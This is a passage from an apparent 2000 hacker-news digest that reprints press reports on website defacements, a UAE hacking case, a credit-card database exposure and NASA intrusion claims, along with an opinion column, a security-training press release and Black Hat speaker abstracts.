http://www.fsa.gov.uk . @HWA 275.0 [IND] Hacker Attacks Gun Control Group's Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 21 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_062100a_j.shtml 6/21/00 Hacker Attacks Gun Control Group's Web Site By Martin Stone, Newsbytes WASHINGTON, DC, U.S.A., 21 Jun 2000, 7:34 AM CST The Web site of nonprofit gun-control group Violence Policy Center was reportedly attacked by an apparently pro-gun hacker who left the message, "If you take my guns, I still have my computer. VPC just got shot in the head." An Associated Press report today said the site was also defaced with images of bombs, a skull and crossbones and obscenities. In addition, the report said, all of the group’s e-mail had been rerouted to the hacker. The intrusion was discovered Monday and reported to the FBI, according to the report. The group's domain name registrar, Network Solutions Inc. of Herndon, Va., was asked to restore the VPC Web address. Network Solutions said the process would take 12 to 24 hours. AP said that public Internet registration records showed the "vpc.org" name to be registered to a Ted Torian, which appeared to be an alias, at an address in Los Angeles. VPC said it has no knowledge of that name, and though the group has a Los Angeles office, it's not at that address and the phone numbers listed on the registration records are not in service. An e-mail apparently intercepted by the hacker had been rerouted to an anonymous Yahoo mail account and the AP said investigators discovered the account had been accessed through a computer at the University of Nebraska at Lincoln. @HWA 276.0 [IND] Hackers Attack Nike, United Arab Emirates Sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 22 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_062200a_j.shtml 6/22/00 Hackers Attack Nike, United Arab Emirates Sites By Martin Stone, Newsbytes MONTREAL, QUEBEC, CANADA, 22 Jun 2000, 7:07 AM CST Hackers struck at two prominent Web sites Wednesday, one belonging to sportswear giant Nike Corp. in an apparent attempt to disrupt an economic forum in Australia, the other operated by the government of the United Arab Emirates. An Associated Press report today said officials at Nike notified the FBI after discovering a hacker had diverted access from its Web site to a site devoted to disrupting an international economic forum in Australia. The report said Nike computers were never breached and its electronic security protected all online customers. A Reuters report today said a British man is in custody under suspicion for hacking into the UAE Internet system. He faces charges of damaging the country's economy, according to local newspaper reports today. Reuters said the 26-year-old man, a senior computer engineer in Dubai, was arrested last week after being traced by Emirates Telecommunications Corp. (Etisalat) security staff. The reports cite Dubai police chief Major General Dhahi Khalfan Tamim as saying the unidentified Brit could be charged with damage to the UAE economy if shown he destroyed data in the Web system. Dubai does not have specific computer crimes laws, but the suspect could receive up to 10 years in prison, the reports said. Reuters said Etisalat officials blame the suspect for much of the disruption experienced by local Web users in the past two weeks. Dubai has been pushing to become a regional hub for information technology and electronic commerce and last year invested $200 million in establishing an e-commerce and IT free-trade zone, called Dubai Internet City. Associated Press said that for six hours access to the Nike site was diverted through computers operated by various Internet service providers, including FirstNET Online in Edinburgh, Scotland, to the destination, http://www.s11.org, a page proclaiming "Global justice is coming - prepare now!" The page also included messages urging protesters to gather Sept. 11-13 at the World Economic Forum in Melbourne, Australia. The s11 Web site uses British spellings and describes itself as part of a "network of organisations, affinity groups and individuals that all share a common concern about the growth of corporate power and the direction of globalisation," the AP report said. @HWA 277.0 [IND] Rock Band's Answer To Napster: Sabotage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 22 2000 Source: www.infowar.com http://www.infowar.com/hacker/00/hack_062200b_j.shtml 6/22/00 Rock Band's Answer To Napster: Sabotage By Kevin Featherly, Newsbytes OAKLAND, CALIFORNIA, U.S.A., 22 Jun 2000, 12:42 PM CST From the left bank of the US, Oakland, Calif., there is fomenting a plot to overthrow the much-blasted Napster music file-sharing system - by using Napster against itself. A Web site belonging to the obscure Clash-meets-Lou-Reed rock combo The Tabloids (http://www.stopnapster.com ), is publicly campaigning for guerrilla tactics against the MP3-swapping service that many contend is violating artists and record labels' copyrights by allowing users to give music to each other without paying for the pleasure. And the plan, according to the site, is sabotage. The site encourages anti-Napsterites to use Napster itself to send out "Trojan Horses" and "Napster bombs" to disrupt the service - while causing no harm to anyone's computer. "Here's a suggestion for making effective electronic counter measures that thwart MP3 file sharing in violation of copyright laws," said the site, which is registered to Tabloids lead singer, songwriter and guitarist Michael Robinson. "From now on, prerecorded music is released in two digital formats: the original compact disc as well as Trojan Horse MP3 files, which are non-destructive, digital decoys." The result? Say a user downloads one of Eminem's new releases. They are happily listening to the purloined tune when suddenly Charleton Heston begins reading a public interest message opposing song theft. "The Trojan Horse does nothing to hurt your hard drive, computer or files," the site says. "But it's annoying." The effort has done very little to ingratiate the band with hardcore Napster users, who have taken to online chat sessions in droves to decry the band's technological short-sightedness and to accuse Robinson and crew of exploiting the Napster controversy to put their little-known band in the public eye. All of which, Michael Robinson says, couldn't matter less. "My wife and I sat down and just went through all of the objections that people would have," Robinson told Newsbytes this morning. "It's like a ping-pong ball hitting a tank as far as I'm concerned. It doesn't hit me, I don't care, because really, ultimately, I have a history of speaking out on issues." True enough. Robinson is not your average high school dropout who formed a punk-rock group. He is a former journalist, a professional photographer, and a published author whose now out-of-print 1990 book, "Overdrawn," took on the late 1980s savings and loan crisis. "The constitutional aspect of this is really what is driving me more than anything else," he said. "I thought about it long and hard, my wife and I went through a lot of skull sessions. And I'm not going to sit on the sidelines of this fight." As for accusations that he is engaging in a publicity stunt, Robinson has this retort. "They can think whatever they want; it doesn't matter or phase me. My default is that I'm amazed by the implications of this. If you think about it, if this Napster thing continues, then everything is up for grabs. Your song can be used on a soundtrack without your permission, Coca-Cola could use your songs in an advertisement. If you don't put this as a Maginot Line right now, where does it go? What about patents, what about authors, what about photographers?" The issue arises at a time when the industry, and some artists, are pulling together to take aim at music file-sharing, and Napster is the target's bull's-eye. The Recording Industry Association of America, representing a number of major record labels, is suing the service and seeking to shut it down. The Wall Street Journal reported today that a group called Artists Against Piracy, also backed by the labels, is planning an anti-Napster media blitz this summer. Robinson, who says he is not affiliated with the major labels, said his target is not primarily Napster users themselves, but political leaders whose job it is to shape and create laws, and to protect the old ones. Robinson cites the US Constitution's Article 1, Section 8, as proof that the activity Napster and its users are engaging in is illegal and unconstitutional. That section says Congress shall have the power "to promote the progress of science and useful arts, by securing for limited times to authors and inventors the exclusive right to their respective writings and discoveries." A survey released yesterday indicated that Napster users do not agree. The nationwide survey of 300 adults who download music off the Internet conducted by Connecticut-based market research firm InsightExpress, indicates that nearly half of Napster users surveyed feel the service does not violate federal copyright statutes. And more than half feel they are not themselves guilty of violating copyright law when using Napster. Again, Robinson is unmoved. "It's not for the great unwashed to decide what's in my best interests," he said. "Ten million people should not have the technological weapon to rip off thousands of other people who do not have the technology to combat them. That's not what America stands for." Likewise, frequent arguments that Napster and its many clones actually drive sales because they expose people to music they never heard before - an argument given weight by a recent study of 17,000 users by Yankelovich Partners Inc. - also are meaningless to Robinson. "I feel like it's not for a group of people to look at some survey and say, 'Hey, it's going to be good in the long run,'" the musician said. "It's not their right to make that decision. It belongs to the copyright holder. It's their decision and no one else's." And he is unswayed by prevailing arguments from people like Public Enemy rapper Chuck D., holding that Napster represents a technological tide cannot be turned. "That's the thing about the technology. But just because the cops can tap your phone doesn't mean they should," Robinson said. "One of the things that's implicit in the site is we're asking for legislation. We're trying to raise the constitutional issue. We're saying you can't just get rid of (copyright protections) because it's inconvenient. We as a nation have got to come to some sort of consensus on this." The Stop Napster site is online at http://www.stopnapster.com . @HWA 278.0 [IND] Pro-gun Hackers Take Over Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 26 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_062600a_j.shtml 6/26/00 Pro-gun Hackers Take Over Web Site For a while at least, the 10 or so employees of the Violence Policy Center tried to remain blas after their Web site was hijacked Monday by anti-gun control hackers, their usual home page replaced by a clunky gray box with a bomb and a skull and crossbones. Josh Sugarmann, VPC's executive director, figured the site could be restored in a matter of hours, and refrained from trying to fix the site in order to "leave the crime scene untouched" for the FBI. Tuesday, however, he learned that the cyberterrorists didn't just hack on to their site, linking to pro-gun groups, erasing mountains of data (which VPC luckily had saved) and gloating onscreen about getting rid of VPC's "propagandist bullshit." They also stole the group's Web identity. Apparently, the hackers figured out a way to actually take over access to the site, which is licensed to VPC by Network Solutions. So until Sugarmann finds out how to wrest control away from them, the hackers are masters of the group's domain. That includes incoming e-mail to VPC from its Web address, which makes Sugarmann concerned for the safety of the senders. Then, in more bad news, the FBI told Sugarmann that the hacking doesn't become a blip on the FBI's radar screen until the group can prove it has incurred $5,000 in damages -- a serious hurdle for a nonprofit organization, because its losses are largely confined to the labor required to fix the hacking mess. Its product is information, which it gives away for free, so assessing damages becomes a guessing game. "These are standards that are put in place for for-profit entities," he said. VPC is a fairly frequent target of gun advocates -- and vice versa. The group is a rising star among gun control groups, most recently scrapping with the NRA over its feathered and kid-friendly mascot, Eddie Eagle, and its plans for a Times Square theme restaurant. In turn, the NRA has taken personal swipes at Sugarmann, and the pro-gun press repeatedly lambastes him and his group. In a way, the attack may have been inevitable. Sugarmann says gun advocates have always been pioneers in communication technology. "They were the first to use computer bulletin boards, they were the first to use the Web, they were the first to use blast fax," he said. "They are way ahead of organizations on our side of the issue." Gun advocates have cloned gun control sites in the past. Handguncontrol.net, a pro-gun site, mirrors the anti-gun Handguncontrol.org, just as Center for the Prevention of Handgun Violence has its own doppelganger. VPC seemed immune to these attacks, since the likely addresses -- vpc.net and vpc.com -- are owned by groups unrelated to the gun issue. Gun rights activists may not settle for cloning anymore. According to Sugarmann, those groups could now start aggressive hack attacks against other anti-gun organizations, having been emboldened by their temporary triumph over VPC. "In pro-gun cyberspace," he says, "this is a big victory." By Alicia Montgomery June 21, 2000 http://www.salon.com/politics/feature/2000/06/21/guns/index.html Pro-gun hackers take over Web site And a prominent group of gun critics is still trying to get it back. About the writer Alicia Montgomery is an assistant editor in Salon's Washington bureau. @HWA 279.0 [IND] Hacker Taps Into 24,000 Credit Cards ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 6/26/00 Hacker Taps Into 24,000 Credit Cards Maurice Chittenden June 25 2000 BRITAIN A COMPUTER hacker has breached the security of a pioneering internet service provider to obtain the names, addresses, passwords and credit card details of more than 24,000 people. The victims include scientists at the top-secret Defence Evaluation and Research Agency, senior officials in the government, BBC bosses and executives at companies such as Shell, Barclaycard and Halifax. The hacker, an information technology consultant, says that he targeted Redhotant to expose security lapses. The Kent-based company is at the forefront of a new style of internet provision: subscribers pay as little as Ł30 a year for unlimited access to the web with no additional phone charges. It aims to attract half a million users in Britain, but its critics say it is failing to cope with demand. Trading standards officers are investigating complaints that people have had difficulty getting online, although the company claims to have a line for every nine customers. The company, which has taken up to Ł1.5m in subscriptions, says it plans to double capacity. Last week it was offline for several days and blamed a technical hitch after a thunderstorm. The consultant who obtained the details of Redhotant's subscribers broke the data protection law but says he did it only out of public interest to highlight lack of security. He used a proxy, a device normally used for disguising the identity of a user, as an intermediary to search the site for files. Among them he found the customer database. Only those connected to the company's internal network are supposed to access it. The hacker got around this by typing in: "referrer: the intranet site". He said: "It was child's play. I didn't actually need to hack in the normal sense because I didn't need any passwords. It was like rooting around in bins for a key and then finding there was a wide-open side entrance. "Redhotant's biggest mistake was keeping its own records on the same disk and machine as all its services." He added: "I sent them a couple of e-mails alerting them to the problem but they ignored it. The lesson is simple. Don't put anything on a website that you wouldn't put on a billboard." Redhotant is part of the Jak internet group, which operates from offices near the Channel Tunnel in Kent. Kevin Packwood, a director, said he was unaware of the security breach. He said: "I would be very surprised if somebody could get that far. Our security measures should have been able to see it happening and alarms would have sounded." http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.html @HWA 280.0 [IND] Etisalat Vows to Prosecute Internet Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_062800a_j.shtml 6/28/00 Etisalat Vows to Prosecute Internet Hackers DUBAI (Reuters) - United Arab Emirates telecoms firm Etisalat has vowed to prosecute hackers into the country's Internet system and described as ``baseless'' lawsuits by a Briton alleged to have disrupted online services earlier this month. ``It is appalling to think that any of these 'hackers' can infiltrate a computer security system and cause absolute chaos with direct economic consequences,'' Etisalat's lawyer, Hamad Kadfoor al-Mehairi, said in a statement received by Reuters on Wednesday. ``We have a duty at Etisalat and the government of the UAE to safeguard the confidentiality of our customers to ensure complete trust in the system. We will not hesitate in prosecuting anyone who abuses the system,'' he added. Lee Alan Ashurst, 21, of Manchester, suspected by Etisalat officials of hacking and blamed for disruption experienced by some local Internet subscribers earlier this month, has denied the accusations and said he had filed lawsuits for defamation and damages against Etisalat. ``I have no idea what they (Etisalat) are talking about, I am being used as a scapegoat,'' Ashurst told a news conference on Monday. ``I have lost my job, my company car and apartment as a result of these accusations and I am suing Etisalat for defamation and damages,'' he added. Mehairi said Etisalat viewed the lawsuit as ``baseless and simply a diversionary tactic.'' Mehairi said hacking into the Internet system endangered electronic commerce in the UAE and was punishable under the law by up to ten years in jail. Dubai is trying to build on its reputation as a regional trading hub to attract international information technology firms to set up bases at a $272 million free trade zone for electronic commerce scheduled to open later this year. Local media on Monday quoted Dubai's Attorney General Ibrahim abu Melha as saying a committee of computer experts was looking into the case and would examine statements from both Etisalat and Ashurst. ``Once the technical report is made public, the seriousness of the crime would be obvious. Although many of the younger generation view the Internet as a challenging game or pastime, we have to protect the commercial interest of the United Arab Emirates,'' Mehairi said. @HWA 281.0 [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_062800b_j.shtml 6/28/00 Company Press Release Foundstone's Ultimate Hacking Course Available at Black Hat Briefings 'White Hat' Consultants Offer Popular Computer Security Training July 24-25 IRVINE, Calif.--(BUSINESS WIRE)--June 28, 2000--Foundstone Inc., the leading ``white hat'' computer security training and consulting company, and Black Hat Briefings today announced that Foundstone's Ultimate Hacking: Black Hat Edition course will be offered July 24-25 in conjunction with the Black Hat Briefings 2000 conference in Las Vegas that week. The latest addition to Foundstone's renowned security training program, Ultimate Hacking: Black Hat Edition is an intensive, hands-on course designed for system administrators, network engineers, and others who work at the ``front lines'' protecting their organizations from hacker attacks. Scheduled for the two days preceding the Black Hat Briefings, the course is a complement to the annual gathering of corporate and ``underground'' security specialists. ``The top security professionals from around the world come to the Black Hat Briefings to mingle with the enemy,'' said George Kurtz, Foundstone CEO. ``They come because they know in order to protect a network, they must understand how a hacker works. And that's what Ultimate Hacking will show them.'' In Ultimate Hacking: Black Hat Edition, course participants will learn from Foundstone's all-star team of experienced security professionals, including the co-authors of Hacking Exposed: Network Security Secrets and Solutions. Written by the company's founders, this best-selling guide exposes hacker techniques and methods to defend against them. ``I strive to put together the best security conferences and pre-show training that I can,'' said Jeff Moss, Founder and President of Black Hat, Inc. ``To meet that expectation, we have partnered with Foundstone. Not only can they walk the walk, but collectively they have years of experience in breaking into Corporate America and defending against hacker threats.'' Ultimate Hacking: Black Hat Edition training will take place in a fully configured classroom lab to dramatically illustrate the critical vulnerabilities in Windows and Unix systems and the latest countermeasures for them. ``The best way for participants to gain this knowledge and sharpen their skills is to 'learn-by-doing' in a hands-on environment,'' said Kurtz. Topics covered will include ``Assessing and Penetrating NT and Unix Networks and Hosts'', ``Securing NT and Unix Hosts'', and ``Identifying Common E-Commerce Web Vulnerabilities''. To sign up for Ultimate Hacking: Black Hat Edition, interested persons should visit the Black Hat web site at www.blackhat.com. About Foundstone Foundstone Inc., headquartered in Irvine, California, is the premier computer security training and consulting company. Foundstone's team of experts have thwarted hackers for years at the highest corporate and government levels, including three of the Big Five accounting firms, the United States Air Force, and defense contractors for classified Department of Defense projects such as the B-2 Stealth Bomber. Foundstone's multi-pronged approach to preventing computer crime involves building security expertise within corporations through training, attack and penetration testing, and incident-response assessment. Using these methods, Foundstone has secured the computer operations of leading dot-coms and Global 2000 companies across a wide range of industries. Contact Foundstone at 877/91-FOUND or visit www.foundstone.com. About Black Hat Briefings 2000 The Black Hat Briefings conference series brings together corporate security professionals and the ``underground'' security experts who develop the tools used by and against hackers. By tradition, the Black Hat Briefings are held in Las Vegas during the days immediately preceding DEF CON, the largest hacker convention in the U.S. This year, the Black Hat Briefings are July 26-27, with DEF CON 8.0 following on July 28-30. The Black Hat Briefings conference is an ``in the trenches'', vendor-neutral gathering where administrators, engineers, and programmers learn about the latest developments in hacking and computer security, giving them a no-nonsense way to protect their networks and systems in the real world. For more information visit www.blackhat.com. Foundstone, Inc. -- Securing the Dot Com World -------------------------------------------------------------------------------- Contact: Foundstone, Inc. Nico Sell, 650/456-0943 nico@foundstone.com @HWA 282.0 [IND] Student Admits Hacking U.S. Government Computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_063000a_j.shtml 6/30/00 Student Admits Hacking U.S. Government Computers BOSTON (Reuters) - A university student admitted in Boston federal court to breaking into U.S. government computers including Defense Department and NASA systems. Ikenna Iffih, a student at Northeastern University's College of Computer Science, pleaded guilty to a series of coast-to-coast cyber attacks before U.S. District Judge Robert Keeton late on Thursday. Under a plea deal, Iffih faces up to 20 years in prison with a possible mandatory minimum sentence of six months, a fine of up to $750,000 and three years of supervised release when sentenced on Oct. 25. The 29-year-old student also admitted hacking into Zebra Marketing Online Services (ZMOS), a Washington-state based company that provides Web service to other firms. Court papers showed the Bainbridge Island company near Seattle lost more than $30,000 and took about 42 hours to return to minimal operations during the April 1999 attack. FBI agents, after obtaining about 20 court orders, were able to trace the break-ins to the NASA (National Aeronautics and Space Administration) computer, the Defense Department's Logistics Agency computer, and ZMOS system to the personal computer in Iffih's Boston home. ``All in all, the defendant used his home computer to leave a trail of cybercrime from coast to coast,'' U.S. Attorney for Massachusetts Donald Stern said in a statement. @HWA 283.0 [IND] Hacker may have endangered astronauts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_070300a_j.shtml 7/03/00 Hacker May Have Endangered Astronauts By The Associated Press Special to CNET News.com July 2, 2000, 6:00 p.m. PT http://news.cnet.com/news/0-1005-200-2194575.html Hacker may have endangered astronauts By The Associated Press Special to CNET News.com July 2, 2000, 6:00 p.m. PT LONDON--A computer hacker endangered shuttle astronauts in 1997 by overloading NASA's communication system, according to a report. As the shuttle docked at the Russian space station Mir, a hacker tapped into the National Aeronautics and Space Administration computer system that monitors the heartbeat, pulse and medical condition of astronauts aboard the spacecraft, the British Broadcasting Corp. reported today. "We had an activity at NASA center where a hacker was overloading our system...to such an extent that it interfered with communications between the NASA center, some medical communications and the astronaut aboard the shuttle," Roberta Gross, inspector general at NASA, said in a BBC documentary to be aired tomorrow. NASA was forced to switch systems and talk to the astronauts via the space station. The report was released ahead of the premiere of "Cyber Attack," which looks at how hackers are able to penetrate the defense systems of such countries as the United States and Britain. Gross said NASA has numerous fail-safe measures to ensure communications, "but it shows the potential hackers have for doing some real damage to NASA's mission and astronaut safety." In the past year, NASA has experienced more than 500,000 cyberattacks, the report said. "Everybody knows if there's a problem at Houston, a potential vulnerability or someone is able to supersede the system we set up, that's dangerous," Gross said. Astronaut Michael Foale, who was part of the 1997 mission, told the BBC he was not informed of the problems at the time but found the revelations intriguing. Copyright © 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. @HWA 284.0 [IND] Accused UAE Hacker Files Defamation Lawsuit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_070300b_j.shtml 7/03/00 Accused UAE Hacker Files Defamation Lawsuit By Steve Gold, Newsbytes DUBAI, UNITED ARAB EMIRATES, 03 Jul 2000, 1:20 PM CST A British man who was arrested in mid-June, suspected of hacking into the United Arab Emirates' (UAE's) Internet system, has sued the telecommunications company instrumental in his arrest. The unnamed 21-year-old, originally from the UK, was arrested in mid June and was expected to be charged with damaging the country's economy, a serious offense that carries up to a 10-year prison sentence. The 21-year-old man, who works as a senior computer engineer in Dubai, was traced by Etisalat's network security staff. He was released after 24 hours in jail and has not yet been charged. The case is thought to be the first computer hacking in the Middle East. Like many countries in the region, the UAE has no computer security legislation in place. In press reports after the arrest, Etisalat officials blamed the suspected hacker for much of the disruption that has been experienced by local Internet subscribers in the past two weeks. Some local media reports appear to have revealed sufficient information for the man to be identified by people in the UAE computer industry. As a result of this, his lawyer, Habib al-Mulla told reporters over the weekend that his client was filing for defamation. The lawyer has also applied for copies of Etisalat's records from when the alleged sabotage on its computer systems took place. Reports suggest that Etisalat will appear in court on July 9 to offer its defense in the defamation case. If charges are made, al-Mulla's client could face up to 10 years in prison, although media reports suggest that he will only face up to six months, as well as fines approaching $2,750. Etisalat's Web site is at http://www.etisalat.co.ae . @HWA 285.0 [IND] NASA Denies Hacker Attack Danger ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_070500a_j.shtml 7/05/00 NASA Denies Hacker Attack Danger By DAVID HO, Associated Press Writer WASHINGTON (AP) - NASA officials denied reports Monday that a computer hacker attack in 1997 endangered astronauts by disrupting communications with the space shuttle Atlantis. The British Broadcasting Corp. had reported that during a rendezvous with the Russian space station Mir, a hacker interfered with communications and forced the shuttle crew to use the Russian station to maintain contact with NASA. http://dailynews.yahoo.com/h/ap/20000703/tc/nasa_hacker_1.html Monday July 3 7:38 PM ET NASA Denies Hacker Attack Danger By DAVID HO, Associated Press Writer WASHINGTON (AP) - NASA officials denied reports Monday that a computer hacker attack in 1997 endangered astronauts by disrupting communications with the space shuttle Atlantis. The British Broadcasting Corp. had reported that during a rendezvous with the Russian space station Mir, a hacker interfered with communications and forced the shuttle crew to use the Russian station to maintain contact with NASA. ``At no point did ground controllers lose contact with the astronauts. That never happened,'' said National Aeronautics and Space Administration spokesman Bob Jacobs. Speak your mind Discuss this story with other people. [Start a Conversation] (Requires Yahoo! Messenger) He also said the astronauts never used the Russian space station as a communications relay. The BBC could not immediately be reached for comment. Jacobs did confirm a hacker had delayed the transmission of astronaut medical data between NASA computer systems on the ground, but backup systems corrected the problem. The medical information had already been sent down from the shuttle and was being distributed to different locations. ``People try to hack into the system constantly, but any mission critical computer system is insulated from the communications network,'' he said, noting that hackers had made about 500,000 attacks against the space agency in the last year. Jacobs said NASA's headquarters didn't know who had conducted the attack, but the agency's inspector general is investigating the incident. The BBC report was released in advance of a documentary aired Monday called ``Cyber Attack,'' which looked at how hackers penetrate the computer defenses of countries like the United States and Britain. The BBC reported that Roberta Gross, NASA inspector general, said, ``We had an activity at NASA center where a hacker was overloading our system ... to such an extent that it interfered with communications between the NASA center, some medical communications and the astronaut aboard the shuttle.'' Jacobs said Gross had been referring to the disruption on the ground and not any problem communicating with the astronauts. During the September 1997 mission, the space shuttle Atlantis retrieved astronaut Michael Foale, who had spent 134 days aboard Mir. Last Thursday, a former computer science student of Northeastern University pleaded guilty to going on a hacking spree against private and government targets, including the military and NASA. Ikenna Iffih, 20, broke into computers at NASA's Goddard Space Flight Center in Greenbelt, Md. and installed a program to capture users' names and passwords. - On the Net: The National Aeronautics and Space Administration: http://www.nasa.gov BBC program Panorama: http://news.bbc.co.uk/hi/english/events/panorama/ @HWA 286.0 [IND] 'Houston, We Don't Have A Problem.' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_070500b_j.shtml 7/05/00 'Houston, We Don't Have A Problem. ' By David McGuire, Newsbytes WASHINGTON, D.C., U.S.A., 03 Jul 2000, 5:05 PM CST NASA today refuted media reports that earth-based hacker activities endangered the lives of astronauts on Space Shuttle Atlantis during a 1997 mission. Responding to a BBC report indicating that a hacker attack on NASA communications systems had somehow interfered with Mission Control's ability to monitor the astronauts' vital statistics, NASA today said that the Atlantis crew was never in any danger. "Two ground-based computers were delayed in talking to each other (as a result of the 1997 hack) and in fact, the transmission went through," NASA spokesperson Ed Campion said today. The hack had no effect on "information that was flowing up to, or down from, the space shuttle," Campion said. In a report earlier today, Reuters quoted NASA Inspector General Robin Gross as telling the BBC that the hacker attack so disabled NASA computers as to jeopardize shuttle-to-ground communications. But while Campion today confirmed that NASA suffered a hacker attack during the September 1997 Atlantis mission, he contended that shuttle-to- ground communications systems are walled off from the Internet and are "very well protected." "You have to be in the (Mission Control) building to have access to those systems," Campion said. The information transfer that was delayed by the attack was a "routine" medical communication between Houston-based Mission Control and another NASA location, Campion said. The 1997 attack remains under investigation by NASA's Inspector General, Campion said. @HWA 287.0 [IND] Crackers are Common Criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.infowar.com/hacker/00/hack_070500c_j.shtml 7/05/00 Crackers are Common Criminals By: Andrew Thomas Posted: 04/07/2000 at 17:47 GMT Hackers have a certain romantic image - it's a bit like Robin Hood; the small man against the machine; the righter of wrongs, that sort of thing. On British TV the other night, a young hacker from Wales was asked why he had broken into a computer and downloaded several thousand people's bank details. He replied that he had done it to prove that the bank's security procedures were inadequate. It should have been obvious that he had no criminal intent and naturally hadn't done anything with the downloaded details. If he hadn't done it, someone else would have. You are a judge. Before you in the court stands a pimply-faced youth with greasy hair and an ill-advised vestigial beard. He stands accused of breaking into several dozen houses and stealing credit card details and address books. The address books were used to identify future properties to burgle and, whilst in each house, he burnt all the personal correspondence he could find. His defence? "I only did it to prove that the locks on these people's doors were inadequate. If I hadn't done it, someone else would. It's the lock makers' fault." Do you, the judge, dismiss the charges and commend the young chap for his public-spiritedness, whilst roundly condemning locksmiths for their sloppy workmanship? Or do you sentence him to a public flogging and then send him to choky? Spinal Tap Another housebreaker stands accused of a number of break-ins where he stole expensive stereo systems and CD collections. In mitigation, he blames Metallica, Napalm Death and Spinal Tap for making him do it. The reasoning is obvious - if these bands hadn't recorded unencrypted music onto CDs in the first place, he wouldn't have been tempted to pop into other people's houses while they were out and remove them. And he needed the stereo systems to play them on. And the beer from the fridge. And the car to carry it all away in. In what way is hacking into a computer any different from breaking into a house? Both are private property. Locks on doors are only necessary because there are people who can't be bothered to work. They would much rather you worked hard to buy things that they could later remove while you were out earning more money. Faulty locks are not the issue here - criminals are. So why is it always Microsoft that gets blamed for making it too easy for the criminals? Why aren't Compaq, Dell, IBM, Intel and AMD to blame for providing the systems the hackers break into? For that matter, why aren't the telcos and ISPs guilty, too? Do we read stories about Sony being accused that its TVs and videos are encouraging break-ins because you can't bolt them to the floor? Of course Microsoft is a very successful company headed up by very rich people, so envy is probably a key factor here. But surely Microsoft is only exposed to hack attacks to the degree it is because millions of people actually like its products and want to use them. They don't want functionality removed, they want criminals to leave them alone. A hack attack on a Word or Outlook user is surely criminal trespass on their (electronic) property in exactly the same way it is if a burglar breaks into their house. It doesn't matter how easy or hard it is - it's still wrong. Stop blaming Microsoft - it's the hackers who are the guilty ones. ® http://www.theregister.co.uk/content/1/11763.html @HWA 288.0 [IND] Black Hat Briefings -Singapore, May 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 7/05/00 Black Hat Briefings -Singapore, May 2000 This stuff is GOOD. Speaker presentations in Power Point, Audio and Video are available at: http://www.blackhat.com/html/bh-asia-00/bh-asia-00-speakers.html SPEAKERS There were be approximately 14 speakers over two days, including a moderated panel discussion. 5/02/00 Presentation materials now on-line. A/V is encoding this week. The goal of the talks are to inform the audience with quality current state system vulnerabilities and fixes as well as future areas of concern. We cover a broad range of security issues from the perspective of the network administrator, system cracker, and IS managers. Because our unique speakers The Black Hat Briefings will offer the audience a deep insight into the real security issues facing your network with no vendor pitches! -------------------------------------------------------------------------------- Greg Hoglund - Rootkit.com Advanced Buffer Overflow Techniques This is a technical talk aimed at people who have already been exposed to buffer overflows and want to learn more. The talk assumes the audience has at least some knowledge of CPU's and Processes. For those of you who already understand buffer overflows, this talk will be a refreshing discourse on technique. We will show how the injection method can be decoupled from the payload. We then explore the details and challenges of injecting code into a remote process. We will also explore the payload, the encoding methods, and how to dynamically load new functions. Lastly, we discuss the possible effects of a payload, including network worms, virus, and rootkits. Greg Hoglund is a software engineer and researcher. His most notable achievement was the creation of the Asmodeus Security Scanner, a Windows NT based port scanner and ethernet sniffer, which he later sold to Webtrends, Corp. Additionally, Hoglund has written several white papers on content based attacks, kernel patching, and forensics. He currently works as a researcher for Tripwire Security Systems, exploring forensics issues. Their Presentation!(PowerPoint 247k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Batz - Independent Security Researcher. Casing the Joint. What we already know about your network. An overview of what an attacker already knows about your network. The information is described using an ASN.1 template for possible integration into autonomous agents, conspicuously similar to the ones described in Caezars presentation. Batz is an independent security researcher and Evil Super Villain who caused a stir last year by bringing to light some serious concerns with BGP4 configuration and implementation at Blackhat Briefings 99 in Las Vegas Nevada. Their Presentation!(PowerPoint 86k) See It! (surestream video file) Hear it! Real Audio (28k-isdn surestream) -------------------------------------------------------------------------------- Mudge - VP of R&D for @Stake. An analysis of tactics used in discovering "passive" monitoring devices. Formerly CEO and Chief Scientist at renowned "hacker think tank", the L0pht, Mudge is considered one of the nations leading "grey-hat hackers". He, along with the other members of the L0pht, are now heading up @Stake's research labs ensuring that the company is at the cutting edge of Internet security. Mudge is a widely sought after keynote speaker in various forums, including analysis of electronic threats to national security. He has been called to testify before the Senate Committee on Governmental Affairs, has briefed a wide range of members of Congress and has conducted training courses for the Department of Justice, NASA, the US Air Force, and other governmental agencies. A recognized name in crytpanalysis, Mudge has co-authored papers with Bruce Schneier that were published in the 5th ACM Conference on Computer and Communications Security, and 